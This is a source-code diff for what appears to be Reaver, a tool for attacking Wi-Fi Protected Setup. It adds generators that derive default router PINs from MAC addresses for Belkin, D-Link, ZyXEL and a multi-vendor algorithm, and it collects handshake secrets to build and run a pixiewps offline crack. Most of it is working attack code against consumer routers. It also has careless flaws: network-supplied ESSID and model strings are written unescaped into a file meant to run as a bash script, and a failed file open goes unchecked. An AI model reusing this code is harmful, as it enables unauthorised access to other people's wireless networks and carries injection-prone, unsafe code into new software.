19 | 20 | static int hex2num(char c) |
411 | 412 | } |
412 | 413 | |
413 | 414 | |
414 | /* http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/ */ | |
415 | /* Generates a standard WPS checksum from a 7 digit pin */ | |
416 | int wps_checksum(int pin) | |
417 | { | |
418 | int div = 0; | |
419 | ||
420 | while(pin) | |
421 | { | |
422 | div += 3 * (pin % 10); | |
423 | pin /= 10; | |
424 | div += pin % 10; | |
425 | pin /= 10; | |
426 | } | |
427 | ||
428 | return ((10 - div % 10) % 10); | |
429 | } | |
430 | ||
431 | 415 | unsigned int hexToInt(const char *hex) |
432 | 416 | { |
433 | 417 | unsigned int result = 0; |
452 | 436 | /* Belkin Default Pin generator created by devttys0 team */ |
453 | 437 | /* http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/ */ |
454 | 438 | /* Munges the MAC and serial numbers to create a WPS pin */ |
455 | int pingen_belkin(char *mac, char *serial, int len_serial, int add) | |
439 | int pingen_belkin(const char *mac, const char *serial, int len_serial, int add) | |
456 | 440 | { |
457 | 441 | #define NIC_NIBBLE_0 0 |
458 | 442 | #define NIC_NIBBLE_1 1 |
529 | 513 | //pingen mac init c83a35 |
530 | 514 | //printf("WPS PIN is: %07d%d\n",4402328%10000000,wps_checksum(4402328%10000000)); |
531 | 515 | |
532 | return (pin * 10) + wps_checksum(pin); | |
516 | return (pin * 10) + wps_pin_checksum(pin); | |
533 | 517 | } |
534 | 518 | |
535 | 519 | |
542 | 526 | http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ |
543 | 527 | */ |
544 | 528 | |
545 | int pingen_dlink(char *mac, char *serial, int len_serial, int add) | |
546 | { | |
547 | int mac_len=0, serial_len=0, nic=0, pin=0; | |
529 | int pingen_dlink(char *mac, int add) | |
530 | { | |
531 | int nic=0, pin=0; | |
548 | 532 | char buff[10]; |
549 | ||
550 | mac_len = strlen(mac); | |
551 | serial_len = len_serial; | |
552 | 533 | |
553 | 534 | nic = hexToInt(strncpy(buff, mac+6, sizeof(buff))); |
554 | 535 | nic = nic + add; |
567 | 548 | |
568 | 549 | } |
569 | 550 | |
570 | return (pin * 10) + wps_checksum(pin); | |
571 | } | |
551 | return (pin * 10) + wps_pin_checksum(pin); | |
552 | } | |
553 | ||
554 | /* Zhaochunsheng algorithm | |
555 | This algorithm was first released in the script ComputePIN-C83A35 for Tenda W309R (April 2012) | |
556 | The same algorithm was found on several devices from different manufacturers. | |
557 | This is a non exhaustive list of affected models: | |
558 | ASUSTek COMPUTER INC. RT-G32 | |
559 | Belkin F5D8235-4v1000, F5D8231-4v5000 and F9K1104v1 | |
560 | Conceptronic c300brs4a v2_v1.0.0 and C300BRS4A | |
561 | D-Link International DIR-620 | |
562 | Edimax 3G-6210n and 3G-6220n | |
563 | Hitron Technologies. Inc CDE-30364 | |
564 | HUAWEI HG532e, HG532s and HG566a (HG532c uses a slightly modified version of this algorithm) | |
565 | Kuzomi K1500 and K1550 | |
566 | Samsung SMT-G7440 and SWL (Samsung Wireless Link) | |
567 | TELDAT iRouter1104-W | |
568 | TENDA W309R | |
569 | TP-LINK CO., LTD. TD-W8951ND and TD-W8961ND v2.1 | |
570 | TRENDnet, Inc. TEW-652BRP (TEW-818DRU and TEW-828DRU use a slightly modified version of this algorithm) | |
571 | ZyXEL Communications Co. zyxel NBG-419n and WAP 3205 * | |
572 | */ | |
573 | ||
574 | int pingen_zhaochunsheng(char *mac, int add) | |
575 | { | |
576 | int pin = 0; | |
577 | /* copy the last 3 bytes of the mac addr, i.e. | |
578 | input: "C8:3A:35:00:11:22" -> result: "001122" */ | |
579 | char last3bytes[6+1]; | |
580 | last3bytes[0]=mac[ 9]; | |
581 | last3bytes[1]=mac[10]; | |
582 | ||
583 | last3bytes[2]=mac[12]; | |
584 | last3bytes[3]=mac[13]; | |
585 | ||
586 | last3bytes[4]=mac[15]; | |
587 | last3bytes[5]=mac[16]; | |
588 | ||
589 | last3bytes[6] = 0; | |
590 | ||
591 | sscanf(last3bytes, "%x", &pin); | |
592 | pin = pin % 10000000; | |
593 | return (pin * 10) + wps_pin_checksum(pin); | |
594 | } | |
595 | ||
596 | //mac to decimal by kib0rg | |
597 | int pingen_zyxel(char *mac, int add) | |
598 | { | |
599 | //pingen make by kib0rg, a little change by t6x | |
600 | int pin; | |
601 | ||
602 | char mac_address[7] = {0}; | |
603 | ||
604 | sprintf(mac_address, "%c%c%c%c%c%c", mac[6], mac[7], mac[8], mac[9], mac[10], mac[11]); | |
605 | ||
606 | pin = (hexToInt(mac_address) + add) % 10000000; | |
607 | ||
608 | return (pin * 10) + wps_pin_checksum(pin); | |
609 | } |
443 | 443 | int wpa_snprintf_hex_uppercase(char *buf, size_t buf_size, const u8 *data, |
444 | 444 | size_t len); |
445 | 445 | |
446 | int pingen_belkin(char *mac, char *serial, int len_serial, int add); | |
447 | int pingen_dlink(char *mac, char *serial, int len_serial, int add); | |
446 | int pingen_belkin(const char *mac, const char *serial, int len_serial, int add); | |
447 | int pingen_dlink(char *mac, int add); | |
448 | int pingen_zyxel(char *mac, int add); | |
448 | 449 | |
449 | 450 | #ifdef CONFIG_NATIVE_WINDOWS |
450 | 451 | void wpa_unicode2ascii_inplace(TCHAR *str); |
0 | CC=gcc | |
1 | INC=-I../utils -I ../ | |
2 | ||
3 | all: wps_attr_build.o wps_attr_parse.o wps_attr_process.o wps.o wps_common.o wps_dev_attr.o wps_enrollee.o wps_registrar.o wps_ufd.o | |
4 | ||
5 | wps_attr_build.o: | |
6 | $(CC) $(INC) wps_attr_build.c -c | |
7 | ||
8 | wps_attr_parse.o: | |
9 | $(CC) $(INC) wps_attr_parse.c -c | |
10 | ||
11 | wps_attr_process.o: | |
12 | $(CC) $(INC) wps_attr_process.c -c | |
13 | ||
14 | wps.o: | |
15 | $(CC) $(INC) wps.c -c | |
16 | ||
17 | wps_common.o: | |
18 | $(CC) $(INC) wps_common.c -c | |
19 | ||
20 | wps_dev_attr.o: | |
21 | $(CC) $(INC) wps_dev_attr.c -c | |
22 | ||
23 | wps_enrollee.o: | |
24 | $(CC) $(INC) wps_enrollee.c -c | |
25 | ||
26 | wps_registrar.o: | |
27 | $(CC) $(INC) wps_registrar.c -c | |
28 | ||
29 | wps_ufd.o: | |
30 | $(CC) $(INC) wps_ufd.c -c | |
31 | ||
32 | clean: | |
33 | rm -f *.o |
3 | 3 | char pixie_buf_aux[4000]; |
4 | 4 | char pixie_buf_aux2[4000]; |
5 | 5 | |
6 | ||
6 | //fixed size | |
7 | char pixie_pke[1000]; /* save pke */ | |
8 | char pixie_pkr[1000]; /* save pkr */ | |
9 | char pixie_enonce[100]; /* save e-nonce */ | |
10 | char pixie_rnonce[100]; /* save r-nonce */ | |
11 | char pixie_authkey[100]; /* save AuthKey */ | |
12 | char pixie_ehash1[100]; /* save e-hash1 */ | |
13 | char pixie_ehash2[100]; /* save e-hash2 */ | |
14 | ||
7 | 15 | //int op_pixie=0; |
8 | 16 |
48 | 48 | * @cred_attr_len: Length of cred_attr in octets |
49 | 49 | */ |
50 | 50 | struct wps_credential { |
51 | u8 ssid[32]; | |
51 | char ssid[32]; | |
52 | 52 | size_t ssid_len; |
53 | 53 | u16 auth_type; |
54 | 54 | u16 encr_type; |
61 | 61 | wpabuf_free(wps->dh_pubkey_r); |
62 | 62 | wps->dh_pubkey_r = pubkey; |
63 | 63 | |
64 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) | |
65 | { | |
66 | strcat(cmd_pixie," -r "); | |
67 | } | |
68 | ||
69 | 64 | unsigned char *v; |
70 | 65 | v = wpabuf_mhead_u8(pubkey); |
71 | printf("[P] PKR: "); | |
66 | ||
67 | memset(pixie_pkr,0,sizeof(pixie_pkr)); | |
68 | if ( get_debug()==4 ) | |
69 | { //verbose (-vvv) | |
70 | printf("[P] PKR: "); | |
71 | } | |
72 | 72 | int pixiecnt = 0; |
73 | 73 | for (; pixiecnt < 192; pixiecnt++) { |
74 | printf("%02x", v[pixiecnt]); | |
75 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) | |
76 | { | |
77 | sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]); | |
78 | strcat(cmd_pixie,cmd_pixie_aux); | |
74 | if ( get_debug()==4 ) | |
75 | { //verbose (-vvv) | |
76 | printf("%02x", v[pixiecnt]); | |
79 | 77 | } |
78 | sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]); | |
79 | strcat(pixie_pkr, cmd_pixie_aux); | |
80 | 80 | if (pixiecnt != 191) { |
81 | printf(":"); | |
82 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) | |
83 | { | |
84 | strcat(cmd_pixie,":"); | |
81 | if ( get_debug()==4 ) | |
82 | { //verbose (-vvv) | |
83 | printf(":"); | |
85 | 84 | } |
85 | strcat(pixie_pkr,":"); | |
86 | 86 | } |
87 | 87 | } |
88 | printf("\n"); | |
88 | if ( get_debug()==4 ) | |
89 | { //verbose (-vvv) | |
90 | printf("\n"); | |
91 | } | |
89 | 92 | |
90 | 93 | |
91 | 94 |
128 | 128 | wpa_hexdump_key(MSG_DEBUG, "WPS: EMSK", wps->emsk, WPS_EMSK_LEN); |
129 | 129 | |
130 | 130 | /****** ADD THIS PART ******/ |
131 | strcat(cmd_pixie," -a "); | |
132 | printf("[P] AuthKey: "); | |
131 | ||
132 | memset(pixie_authkey,0,sizeof(pixie_authkey)); | |
133 | if ( get_debug()==4 ) | |
134 | { //verbose (-vvv) | |
135 | printf("[P] AuthKey: "); | |
136 | } | |
133 | 137 | int pixiecnt = 0; |
134 | 138 | for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) { |
135 | printf("%02x", wps->authkey[pixiecnt]); | |
139 | if ( get_debug()==4 ) | |
140 | { //verbose (-vvv) | |
141 | printf("%02x", wps->authkey[pixiecnt]); | |
142 | } | |
136 | 143 | sprintf(cmd_pixie_aux, "%02x", wps->authkey[pixiecnt]); |
137 | strcat(cmd_pixie,cmd_pixie_aux); | |
144 | strcat(pixie_authkey, cmd_pixie_aux); | |
138 | 145 | if (pixiecnt != WPS_AUTHKEY_LEN - 1) { |
139 | printf(":"); | |
140 | strcat(cmd_pixie,":"); | |
146 | if ( get_debug()==4 ) | |
147 | { //verbose (-vvv) | |
148 | printf(":"); | |
149 | } | |
150 | strcat(pixie_authkey,":"); | |
141 | 151 | } |
142 | 152 | } |
143 | printf("\n"); | |
153 | if ( get_debug()==4 ) | |
154 | { //verbose (-vvv) | |
155 | printf("\n"); | |
156 | } | |
144 | 157 | /******/ |
145 | 158 | |
146 | 159 | return 0; |
16 | 16 | #include "includes.h" |
17 | 17 | |
18 | 18 | #include "common.h" |
19 | #include "misc.h" | |
19 | 20 | #include "wps_i.h" |
20 | 21 | #include "wps_dev_attr.h" |
21 | 22 | |
188 | 189 | wpa_hexdump_ascii(MSG_DEBUG, "WPS: Manufacturer", str, str_len); |
189 | 190 | |
190 | 191 | /****** ADD THIS PART ******/ |
191 | printf("[P] WPS Manufacturer: "); | |
192 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
193 | { //verbose (-vvv) | |
194 | printf("[P] WPS Manufacturer: "); | |
195 | } | |
192 | 196 | int pixiecnt = 0; |
193 | 197 | for (; pixiecnt < str_len; pixiecnt++) { |
194 | printf("%c", (char *) str[pixiecnt]); | |
195 | } | |
196 | printf("\n"); | |
198 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
199 | { //verbose (-vvv) | |
200 | printf("%c", str[pixiecnt]); | |
201 | } | |
202 | } | |
203 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
204 | { //verbose (-vvv) | |
205 | printf("\n"); | |
206 | } | |
197 | 207 | /******/ |
198 | 208 | |
199 | 209 | |
220 | 230 | wpa_hexdump_ascii(MSG_DEBUG, "WPS: Model Name", str, str_len); |
221 | 231 | |
222 | 232 | /****** ADD THIS PART ******/ |
223 | printf("[P] WPS Model Name: "); | |
233 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
234 | { //verbose (-vvv) | |
235 | printf("[P] WPS Model Name: "); | |
236 | } | |
224 | 237 | int pixiecnt = 0; |
225 | 238 | for (; pixiecnt < str_len; pixiecnt++) { |
226 | printf("%c", (char *) str[pixiecnt]); | |
227 | } | |
228 | printf("\n"); | |
239 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
240 | { //verbose (-vvv) | |
241 | printf("%c", str[pixiecnt]); | |
242 | } | |
243 | } | |
244 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
245 | { //verbose (-vvv) | |
246 | printf("\n"); | |
247 | } | |
229 | 248 | /******/ |
230 | 249 | |
231 | 250 | os_free(dev->model_name); |
250 | 269 | wpa_hexdump_ascii(MSG_DEBUG, "WPS: Model Number", str, str_len); |
251 | 270 | |
252 | 271 | /****** ADD THIS PART ******/ |
253 | printf("[P] WPS Model Number: "); | |
272 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
273 | { //verbose (-vvv) | |
274 | printf("[P] WPS Model Number: "); | |
275 | } | |
254 | 276 | int pixiecnt = 0; |
255 | 277 | for (; pixiecnt < str_len; pixiecnt++) { |
256 | printf("%c", (char *) str[pixiecnt]); | |
257 | } | |
258 | printf("\n"); | |
278 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
279 | { //verbose (-vvv) | |
280 | printf("%c", str[pixiecnt]); | |
281 | } | |
282 | } | |
283 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
284 | { //verbose (-vvv) | |
285 | printf("\n"); | |
286 | } | |
259 | 287 | /******/ |
260 | 288 | |
261 | 289 | os_free(dev->model_number); |
280 | 308 | wpa_hexdump_ascii(MSG_DEBUG, "WPS: Serial Number", str, str_len); |
281 | 309 | |
282 | 310 | /****** ADD THIS PART ******/ |
283 | printf("[P] Access Point Serial Number: "); | |
311 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
312 | { //verbose (-vvv) | |
313 | printf("[P] Access Point Serial Number: "); | |
314 | } | |
284 | 315 | int pixiecnt = 0; |
285 | 316 | for (; pixiecnt < str_len; pixiecnt++) { |
286 | printf("%c", (char *) str[pixiecnt]); | |
287 | } | |
288 | printf("\n"); | |
317 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
318 | { //verbose (-vvv) | |
319 | printf("%c", str[pixiecnt]); | |
320 | } | |
321 | } | |
322 | if ( (get_debug() == 4) || (globule->op_gen_pin >0)) | |
323 | { //verbose (-vvv) | |
324 | printf("\n"); | |
325 | } | |
289 | 326 | /******/ |
290 | 327 | |
291 | 328 | if(globule->stop_in_m1 == 1) |
315 | 352 | if(globule->op_gen_pin == 2) |
316 | 353 | { |
317 | 354 | printf("[Pin Gen] D-Link Default Pin Generator by devttys0 team\n"); |
318 | printf("[Pin Gen] Pin Generated : %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, 0)); | |
319 | printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, 1)); | |
320 | printf("[Pin Gen] Pin Generated (-1): %08d\n\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, -1)); | |
355 | printf("[Pin Gen] Pin Generated : %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), 0)); | |
356 | printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), 1)); | |
357 | printf("[Pin Gen] Pin Generated (-1): %08d\n\n",pingen_dlink(mac2str(get_bssid(),'\0'), -1)); | |
321 | 358 | exit(0); |
322 | 359 | } |
360 | ||
361 | if(globule->op_gen_pin == 3) | |
362 | { | |
363 | printf("[Pin Gen] Zyxel Default Pin Generator\n"); | |
364 | printf("[Pin Gen] Pin Generated : %08d\n",pingen_zyxel(mac2str(get_bssid(),'\0'), 0)); | |
365 | printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_zyxel(mac2str(get_bssid(),'\0'), 1)); | |
366 | printf("[Pin Gen] Pin Generated (-1): %08d\n",pingen_zyxel(mac2str(get_bssid(),'\0'), -1)); | |
367 | exit(0); | |
368 | } | |
323 | 369 | |
324 | 370 | os_free(dev->serial_number); |
325 | 371 | dev->serial_number = os_malloc(str_len + 1); |
513 | 513 | static int wps_process_pubkey(struct wps_data *wps, const u8 *pk, |
514 | 514 | size_t pk_len) |
515 | 515 | { |
516 | printf("--------------------------------------------------------------------------------------"); | |
516 | ||
517 | 517 | if (pk == NULL || pk_len == 0) { |
518 | 518 | wpa_printf(MSG_DEBUG, "WPS: No Public Key received"); |
519 | 519 | return -1; |
543 | 543 | |
544 | 544 | if (wps_derive_keys(wps) < 0) |
545 | 545 | return -1; |
546 | ||
547 | ||
548 | /****** ADD THIS PART ******/ | |
549 | ||
550 | ||
551 | printf("[P] PKR: "); | |
552 | int pixiecnt = 0; | |
553 | for (; pixiecnt < 192; pixiecnt++) { | |
554 | printf("%02x", pk[pixiecnt]); | |
555 | if (pixiecnt != 191) { | |
556 | printf(":"); | |
557 | } | |
558 | } | |
559 | printf("\n"); | |
560 | /******/ | |
561 | ||
562 | ||
563 | ||
564 | ||
565 | ||
566 | 546 | |
567 | 547 | return 0; |
568 | 548 | } |
1394 | 1394 | wps->nonce_r, WPS_NONCE_LEN); |
1395 | 1395 | wpa_hexdump(MSG_DEBUG, "WPS: UUID-R", wps->uuid_r, WPS_UUID_LEN); |
1396 | 1396 | |
1397 | ||
1398 | printf("[P] R-Nonce: "); | |
1397 | if ( get_debug()==4 ) | |
1398 | { //verbose (-vvv) | |
1399 | printf("[P] R-Nonce: "); | |
1400 | } | |
1399 | 1401 | int pixiecnt = 0; |
1400 | 1402 | for (; pixiecnt < WPS_NONCE_LEN; pixiecnt++) |
1401 | 1403 | { |
1402 | printf("%02x", wps->nonce_r[pixiecnt]); | |
1404 | if ( get_debug()==4 ) | |
1405 | { //verbose (-vvv) | |
1406 | printf("%02x", wps->nonce_r[pixiecnt]); | |
1407 | } | |
1403 | 1408 | if (pixiecnt != WPS_NONCE_LEN - 1) { |
1404 | printf(":"); | |
1405 | } | |
1406 | } | |
1407 | printf("\n"); | |
1409 | if ( get_debug()==4 ) | |
1410 | { //verbose (-vvv) | |
1411 | printf(":"); | |
1412 | } | |
1413 | } | |
1414 | } | |
1415 | if ( get_debug()==4 ) | |
1416 | { //verbose (-vvv) | |
1417 | printf("\n"); | |
1418 | } | |
1408 | 1419 | /******/ |
1409 | 1420 | |
1410 | 1421 | |
1484 | 1495 | |
1485 | 1496 | wpa_printf(MSG_DEBUG, "WPS: Building Message M4"); |
1486 | 1497 | |
1487 | wpa_printf(MSG_DEBUG, "WPS: Dev Password Len: %d", wps->dev_password_len); | |
1498 | wpa_printf(MSG_DEBUG, "WPS: Dev Password Len: %zu", wps->dev_password_len); | |
1488 | 1499 | wpa_printf(MSG_DEBUG, "WPS: Dev Password: %s", wps->dev_password); |
1489 | 1500 | |
1490 | 1501 | wps_derive_psk(wps, wps->dev_password, wps->dev_password_len); |
1711 | 1722 | wps->nonce_e, WPS_NONCE_LEN); |
1712 | 1723 | |
1713 | 1724 | /****** ADD THIS PART ******/ |
1714 | memset(cmd_pixie,0,sizeof(cmd_pixie)); | |
1715 | 1725 | memset(cmd_pixie_aux,0,sizeof(cmd_pixie_aux)); |
1716 | strcat(cmd_pixie,"pixiewps "); | |
1717 | ||
1718 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) | |
1719 | { | |
1720 | strcat(cmd_pixie," -n "); | |
1721 | } | |
1722 | printf("[P] E-Nonce: "); | |
1726 | memset(pixie_enonce,0,sizeof(pixie_enonce)); | |
1727 | ||
1728 | if ( get_debug()==4 ) | |
1729 | { //verbose (-vvv) | |
1730 | printf("[P] E-Nonce: "); | |
1731 | } | |
1723 | 1732 | int pixiecnt = 0; |
1724 | 1733 | for (; pixiecnt < WPS_NONCE_LEN; pixiecnt++) |
1725 | 1734 | { |
1726 | printf("%02x", wps->nonce_e[pixiecnt]); | |
1727 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) | |
1728 | { | |
1729 | sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]); | |
1730 | strcat(cmd_pixie,cmd_pixie_aux); | |
1731 | } | |
1735 | if ( get_debug()==4 ) | |
1736 | { //verbose (-vvv) | |
1737 | printf("%02x", wps->nonce_e[pixiecnt]); | |
1738 | } | |
1739 | sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]); | |
1740 | strcat(pixie_enonce, cmd_pixie_aux); | |
1732 | 1741 | if (pixiecnt != WPS_NONCE_LEN - 1) { |
1733 | printf(":"); | |
1734 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) | |
1735 | { | |
1736 | strcat(cmd_pixie,":"); | |
1742 | if ( get_debug()==4 ) | |
1743 | { //verbose (-vvv) | |
1744 | printf(":"); | |
1737 | 1745 | } |
1738 | } | |
1739 | } | |
1740 | printf("\n"); | |
1746 | strcat(pixie_enonce,":"); | |
1747 | } | |
1748 | } | |
1749 | if ( get_debug()==4 ) | |
1750 | { //verbose (-vvv) | |
1751 | printf("\n"); | |
1752 | } | |
1741 | 1753 | /******/ |
1742 | 1754 | |
1743 | 1755 | |
1798 | 1810 | wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN); |
1799 | 1811 | |
1800 | 1812 | /****** ADD THIS PART ******/ |
1801 | strcat(cmd_pixie," -s "); | |
1802 | printf("[P] E-Hash1: "); | |
1813 | memset(pixie_ehash1,0,sizeof(pixie_ehash1)); | |
1814 | if ( get_debug()==4 ) | |
1815 | { //verbose (-vvv) | |
1816 | printf("[P] E-Hash1: "); | |
1817 | } | |
1818 | ||
1803 | 1819 | int pixiecnt = 0; |
1804 | 1820 | for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) { |
1805 | printf("%02x", wps->peer_hash1[pixiecnt]); | |
1821 | if ( get_debug()==4 ) | |
1822 | { //verbose (-vvv) | |
1823 | printf("%02x", wps->peer_hash1[pixiecnt]); | |
1824 | } | |
1806 | 1825 | sprintf(cmd_pixie_aux, "%02x", wps->peer_hash1[pixiecnt]); |
1807 | strcat(cmd_pixie,cmd_pixie_aux); | |
1826 | strcat(pixie_ehash1, cmd_pixie_aux); | |
1808 | 1827 | if (pixiecnt != WPS_HASH_LEN - 1) { |
1809 | printf(":"); | |
1810 | strcat(cmd_pixie,":"); | |
1811 | } | |
1812 | } | |
1813 | printf("\n"); | |
1828 | if ( get_debug()==4 ) | |
1829 | { //verbose (-vvv) | |
1830 | printf(":"); | |
1831 | } | |
1832 | strcat(pixie_ehash1,":"); | |
1833 | } | |
1834 | } | |
1835 | if ( get_debug()==4 ) | |
1836 | { //verbose (-vvv) | |
1837 | printf("\n"); | |
1838 | } | |
1814 | 1839 | /******/ |
1815 | ||
1840 | ||
1816 | 1841 | |
1817 | 1842 | return 0; |
1818 | 1843 | } |
1828 | 1853 | os_memcpy(wps->peer_hash2, e_hash2, WPS_HASH_LEN); |
1829 | 1854 | wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN); |
1830 | 1855 | |
1856 | //get_debug() = 4(-vvv), use this to verbose all pixie msg | |
1857 | ||
1858 | ||
1831 | 1859 | /****** ADD THIS PART ******/ |
1832 | strcat(cmd_pixie," -z "); | |
1833 | printf("[P] E-Hash2: "); | |
1860 | memset(pixie_ehash2,0,sizeof(pixie_ehash2)); | |
1861 | if ( get_debug()==4 ) | |
1862 | { //verbose (-vvv) | |
1863 | printf("[P] E-Hash2: "); | |
1864 | } | |
1834 | 1865 | int pixiecnt = 0; |
1835 | 1866 | for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) { |
1836 | printf("%02x", wps->peer_hash2[pixiecnt]); | |
1867 | if ( get_debug()==4 ) | |
1868 | { //verbose (-vvv) | |
1869 | printf("%02x", wps->peer_hash2[pixiecnt]); | |
1870 | } | |
1837 | 1871 | sprintf(cmd_pixie_aux, "%02x", wps->peer_hash2[pixiecnt]); |
1838 | strcat(cmd_pixie,cmd_pixie_aux); | |
1872 | strcat(pixie_ehash2, cmd_pixie_aux); | |
1839 | 1873 | if (pixiecnt != WPS_HASH_LEN - 1) { |
1840 | printf(":"); | |
1841 | strcat(cmd_pixie,":"); | |
1842 | } | |
1843 | } | |
1844 | printf("\n"); | |
1874 | if ( get_debug()==4 ) | |
1875 | { //verbose (-vvv) | |
1876 | printf(":"); | |
1877 | } | |
1878 | strcat(pixie_ehash2,":"); | |
1879 | } | |
1880 | } | |
1881 | if ( get_debug()==4 ) | |
1882 | { //verbose (-vvv) | |
1883 | printf("\n"); | |
1884 | } | |
1845 | 1885 | /******/ |
1846 | ||
1847 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3){ | |
1848 | //strcat(cmd_pixie," -S "); | |
1849 | strcat(cmd_pixie," "); | |
1850 | } | |
1851 | //sprintf(cmd_pixie,"%s -S",cmd_pixie); | |
1852 | ||
1886 | ||
1887 | memset(cmd_pixie,0,sizeof(cmd_pixie)); | |
1888 | ||
1889 | strcat(cmd_pixie,"pixiewps -e "); | |
1890 | strcat(cmd_pixie,pixie_pke); | |
1891 | ||
1892 | if(globule->dh_small != 1){ | |
1893 | strcat(cmd_pixie," -r "); | |
1894 | strcat(cmd_pixie,pixie_pkr); | |
1895 | } | |
1896 | ||
1897 | strcat(cmd_pixie," -s "); | |
1898 | strcat(cmd_pixie,pixie_ehash1); | |
1899 | strcat(cmd_pixie," -z "); | |
1900 | strcat(cmd_pixie,pixie_ehash2); | |
1901 | strcat(cmd_pixie," -a "); | |
1902 | strcat(cmd_pixie,pixie_authkey); | |
1903 | strcat(cmd_pixie," -n "); | |
1904 | strcat(cmd_pixie,pixie_enonce); | |
1905 | ||
1906 | ||
1907 | if(globule->dh_small == 1){ | |
1908 | strcat(cmd_pixie," -S "); | |
1909 | } | |
1910 | ||
1911 | if (get_pixie_log()) { | |
1912 | char *p_essid = wps->essid; | |
1913 | char *p_model = wps->peer_dev.model_name; | |
1914 | char *p_number = wps->peer_dev.model_number; | |
1915 | char *p_manu = wps->peer_dev.manufacturer; | |
1916 | ||
1917 | if(!p_essid || strlen(p_essid) < 0) | |
1918 | { | |
1919 | p_essid = get_ssid(); | |
1920 | } | |
1921 | ||
1922 | char p_filename[13]; | |
1923 | char p_bssid[18]; | |
1924 | strncpy(p_bssid, mac2str(get_bssid(),':'), 17); | |
1925 | p_bssid[17] = 0; | |
1926 | ||
1927 | unsigned int j = 0; | |
1928 | unsigned int i = 0; | |
1929 | for ( ; i < 17; i++) { | |
1930 | if (p_bssid[i] != ':') { | |
1931 | p_filename[j] = p_bssid[i]; | |
1932 | j++; | |
1933 | } | |
1934 | } | |
1935 | ||
1936 | p_filename[12] = 0; | |
1937 | char p_path[64]; // Bigger for future implementation | |
1938 | ||
1939 | // strncpy(p_path, "/usr/local/etc/reaver/", 22); | |
1940 | ||
1941 | strncpy(p_path, p_filename, 12); | |
1942 | strncpy(p_path + 12, ".pixie", 64 - 12); | |
1943 | ||
1944 | printf("\n[*] Saving collected data in: %s\n\n", p_path); | |
1945 | ||
1946 | FILE *fp; | |
1947 | if (!(fp = fopen(p_path, "a"))) | |
1948 | fprintf(stderr, "[X] Could not open file!\n"); | |
1949 | ||
1950 | if (!ftell(fp)) { | |
1951 | fputs("# Generated by Reaver 1.5.2\n", fp); | |
1952 | fputs("\n#!/usr/bin/env bash", fp); | |
1953 | fputs("\n# Target BSSID: ", fp); | |
1954 | fputs(p_bssid, fp); | |
1955 | fputs("\n# Target ESSID: ", fp); | |
1956 | fputs(p_essid, fp); | |
1957 | fputs("\n# Target MANUFACTURER: ", fp); | |
1958 | fputs(p_manu, fp); | |
1959 | fputs("\n# Target MODEL: ", fp); | |
1960 | fputs(p_model, fp); | |
1961 | fputs("\n# Target MODEL NUMBER: ", fp); | |
1962 | fputs(p_number, fp); | |
1963 | //TODO: Needs implementation to save pin(s) if aquired through -K | |
1964 | } | |
1965 | ||
1966 | fputs("\n\n# PKE : ", fp); | |
1967 | fputs(pixie_pke, fp); | |
1968 | fputs("\n# PKR : ", fp); | |
1969 | fputs(pixie_pkr, fp); | |
1970 | fputs("\n# E-Hash1: ", fp); | |
1971 | fputs(pixie_ehash1, fp); | |
1972 | fputs("\n# E-Hash2: ", fp); | |
1973 | fputs(pixie_ehash2, fp); | |
1974 | fputs("\n# AuthKey: ", fp); | |
1975 | fputs(pixie_authkey, fp); | |
1976 | fputs("\n# E-Nonce: ", fp); | |
1977 | fputs(pixie_enonce, fp); | |
1978 | fputs("\n\n#-----Full command-----#\n", fp); // This is here for raw execution of pixiewps if treated as a script | |
1979 | fputs(cmd_pixie, fp); | |
1980 | fputs("\n", fp); | |
1981 | ||
1982 | fclose(fp); | |
1983 | } | |
1984 | ||
1853 | 1985 | |
1854 | 1986 | if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3) |
1855 | 1987 | { |
1856 | 1988 | |
1857 | 1989 | FILE *fpixe; |
1858 | ||
1859 | //printf(" -- cmd pixie : %s",cmd_pixie); | |
1860 | ||
1990 | ||
1861 | 1991 | if ((fpixe = popen(cmd_pixie, "r")) == NULL) { |
1862 | printf("Error opening pipe!\n"); | |
1992 | if ( get_debug()>=1 ) | |
1993 | { //verbose (-vvv) | |
1994 | printf("Error opening pipe!\n"); | |
1995 | } | |
1863 | 1996 | //return -1; |
1864 | 1997 | } |
1865 | 1998 | |
1866 | 1999 | int pixie_test=0; |
